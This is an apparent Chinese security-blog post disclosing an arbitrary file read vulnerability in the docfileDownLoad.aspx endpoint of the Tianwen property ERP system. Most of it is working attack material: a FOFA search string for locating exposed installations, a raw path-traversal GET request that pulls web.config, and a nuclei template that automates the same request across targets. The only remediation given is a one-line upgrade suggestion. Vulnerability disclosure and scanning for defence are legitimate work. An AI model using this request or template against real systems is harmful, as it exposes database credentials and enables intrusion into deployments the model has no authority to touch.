天问物业ERP系统docfileDownLoad.aspx接口存在任意文件读取漏洞

我是大白   ·   发表于 2024-03-14 17:39:02   ·   漏洞文章

天问物业ERP系统docfileDownLoad.aspx接口存在任意文件读取漏洞

漏洞描述

天问物业ERP系统培训是用友旗下畅捷通公司推出的一项重要服务,旨在帮助物业管某理业提升管理效率和水平。天问物业ERP系统docfileDownLoad.aspx接口存在任意文件读取漏洞

产品界面

fofa语法

body="天问物业ERP系统" || body="国家版权局软著登字第1205328号" || body="/HM/M_Main/frame/sso.aspx"

POC

  1. GET /HM/M_Main/WorkGeneral/docfileDownLoad.aspx?AdjunctFile=../web.config HTTP/1.1
  2. Host:
  3. User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
  4. Accept: */*
  5. Connection: Keep-Alive

nuclei验证

  1. id: tianwen-ERP-docfileDownLoad-fileread
  2. info:
  3. name: 天问物业ERP系统docfileDownLoad.aspx接口存在任意文件读取漏洞
  4. author: nobody
  5. severity: high
  6. description: |
  7. 天问物业ERP系统培训是用友旗下畅捷通公司推出的一项重要服务,旨在帮助物业管某理业提升管理效率和水平。天问物业ERP系统docfileDownLoad.aspx接口存在任意文件读取漏洞
  8. impact: |
  9. 攻击者可以通过该接口读取文件,获取数据库账号密码等敏感信息
  10. remediation: |
  11. 升级版本,打补丁
  12. metadata:
  13. verified: true
  14. max-request: 3
  15. fofa-query: body="天问物业ERP系统" || body="国家版权局软著登字第1205328号" || body="/HM/M_Main/frame/sso.aspx"
  16. tags: fileread
  17. requests:
  18. - raw:
  19. - |
  20. GET /HM/M_Main/WorkGeneral/docfileDownLoad.aspx?AdjunctFile=../web.config HTTP/1.1
  21. Host: {{Hostname}}
  22. User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
  23. Accept: */*
  24. Connection: Keep-Alive
  25. matchers:
  26. - type: dsl
  27. dsl:
  28. - status_code == 200 && contains_all(body,"<?xml","system.web")

修复建议

  • 建议升级到最新版本

打赏我,让我更有动力~

0 条回复   |  直到 9个月前 | 380 次浏览
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.